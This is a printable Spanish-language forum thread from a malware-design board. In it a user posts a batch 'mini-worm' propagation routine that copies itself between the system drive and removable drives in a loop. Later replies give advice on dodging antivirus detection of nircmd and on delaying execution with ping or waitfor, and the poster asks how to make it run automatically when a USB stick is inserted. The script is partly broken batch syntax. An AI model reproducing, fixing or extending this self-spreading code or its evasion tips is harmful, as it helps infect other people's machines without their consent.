Imprimir Página - porfavor den una opinion

Título: porfavor den una opinion
Publicado por: 0xDani en 23 Abril 2012, 20:02 pm

Bueno he estado intentando crear un mini-gusano (o mejor, practicando batch y pensamiento malicioso a la vez) :¬¬ , y aunque se que seguramente no valdra mucho pido su opinion para tratar de aprender algo.
Lo dejo:

Código:

@echo off
:acb
nircmd wait 150000
if exist %homedrive%"\abc.bat" (goto abc) else goto no 
:abc
copy /Y %homedrive%"\abc.bat" "%~d0\" >Nul
nircmd wait 150000
goto acb
:No
if exist %%a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) (goto e) else goto acb
:e
if exist %%a:"\abc.bat" copy /Y %%a:"\abc.bat" %homedrive%
nircmd wait 150000
goto acb

por supuesto esto es solo la parte de la propagacion, y el usar nircmd, un apaño.
Saludos ;D

Título: Re: porfavor den una opinion
Publicado por: Stakewinner00 en 23 Abril 2012, 21:40 pm

no se k es "nircmd" yo hice un gusano mas o menos igual pero con mas sentencias IF

Título: Re: porfavor den una opinion
Publicado por: Karcrack en 23 Abril 2012, 22:02 pm

Hay formas mejores de simular un sleep en Batch sin usar nircmd... nircmd es muy detectado por los AVs

Título: Re: porfavor den una opinion
Publicado por: $Edu$ en 24 Abril 2012, 00:03 am

Karcrack.. si usaria pings para simular un sleep, por ejemplo: ping -n 10 localhost>nul

Es detectado por los avs?

Título: Re: porfavor den una opinion
Publicado por: Karcrack en 24 Abril 2012, 12:59 pm

El problema de nircmd es que es un ejecutable a parte que además está muy taggeado...

No sé nada sobre el análisis heurístico de Batch, pero no creo que un ping tenga nada de maligno... tal vez deberías poner otro host para que no sea tan sospechoso... Aún así la forma lógica y precisa de usar ping para simular un sleep es usando el parámetro w:

Código

ping 1.2.3.4 -n 1 -w %TIEMPO_EN_MILISEGUNDOS% >NUL

Para mi gusto la mejor forma de hacer una pausa es esta (Aunque creo que en W$XP no viene por defecto :¬¬):

Código

waitfor /T %TIEMPO_EN_SEGUNDOS% karcrack_ejemplo >NUL

Título: Re: porfavor den una opinion
Publicado por: $Edu$ en 24 Abril 2012, 17:51 pm

No conocia esa primer forma de simular el sleep, casi todos usan ping -n %tiempo_en_segundos% localhost>nul , por los codigos que he visto desde hace tiempo, pero es todo a confiarse de que cada ping demorara 1 seg, por eso si se hace 10 pings demoraria supuestamente 10 segs, pero nunca estuve del todo seguro, ese que dejas si es preciso y esta bien, Gracias!

Título: Re: porfavor den una opinion
Publicado por: 0xDani en 25 Abril 2012, 18:51 pm

¿Alguien me podria recomendar una forma de hacer que el programa se ejecute cuando se introduzca el pen?He probado con autorun.inf, pero no funciona xk al introducir el pen te sale la ventana preguntandote que quieres hacer(abrir una carpeta,reproducir todo,etc...)
Gracias por sus opiniones y por lo del ping. ;-)

Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: 0xDani en 23 Abril 2012, 20:02 pm